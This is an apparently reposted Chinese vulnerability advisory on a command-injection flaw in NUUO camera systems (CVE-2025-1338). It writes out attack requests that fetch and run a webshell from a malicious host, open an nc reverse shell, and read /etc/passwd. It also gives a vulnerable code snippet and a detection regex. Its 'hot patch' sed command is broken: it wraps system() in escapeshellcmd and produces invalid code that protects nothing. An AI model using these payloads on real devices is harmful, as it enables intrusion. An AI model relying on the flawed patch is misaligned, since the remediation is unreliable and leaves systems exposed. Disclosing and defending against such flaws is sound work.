0x01 漏洞杀伤链
攻击向量:
GET /handle_config.php?log=;curl${IFS}http://恶意IP/webshell.sh|bash;Host: target-ip
实现效果:
✅ 任意命令执行(代码注入)
✅ /etc/shadow等敏感文件读取
✅ 内网渗透跳板(通过摄像头访问控制网络)
✅ 持久化后门植入(修改固件镜像)
0x02 技术深度解析
漏洞根源:
// 漏洞代码片段(php/system_functions.php)$log_command = "echo '" . $_GET['log'] . "' >> /var/log/system.log";system($log_command);
漏洞特征:
未对log参数进行输入净化
直接拼接操作系统命令
未启用PHP安全模式(disable_functions未配置)
攻击演进:
# 多命令分隔符组合攻击GET /handle_config.php?log=%0a%0d/bin/bash${IFS}-c${IFS}'mkfifo${IFS}/tmp/f;cat${IFS}/tmp/f|/bin/sh${IFS}-i${IFS}2>&1|nc${IFS}攻击者IP${IFS}端口${IFS} >/tmp/f'%0a HTTP/1.1
# 文件系统遍历GET /handle_config.php?log=;cat${IFS}/../../../../etc/passwd HTTP/1.1
0x03 影响范围
全系列版本 <= 3.11.0
存在以下特征的NUUO设备:
✔️ Web界面包含/eHelpdesk.php路径
✔️ 系统日志功能模块启用
✔️ 未配置iptables过滤规则
0x04 企业级防御方案
1. 热补丁脚本(临时防护)
# 通过SSH登录设备执行sed -i 's/system(/escapeshellcmd(system(/g' /var/www/html/php/system_functions.phpchmod 440 /var/www/html/handle_config.php
2. 网络层防护(Cisco ASA示例)
access-list NUUO-ACL extended deny tcp any any eq 80url-logging enableregex "GET.*handle_config.php?log=.*[;&|${IFS}]"access-group NUUO-ACL in interface outside
3. 终极解决方案
立即升级至官方安全版本(需联系nuuo技术支持获取)
禁用Web管理界面非必要功能模块
威胁情报追踪
监测到攻击者正批量扫描全球80端口,攻击流量特征包含:
GET /handle_config.php?log=;wget${IFS}User-Agent: NUUO-Exploit-Kit/2.0
原文始发于微信公众号(云梦安全):核弹级漏洞预警|NUUO监控设备远程沦陷实录(CVE-2025-1338)
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论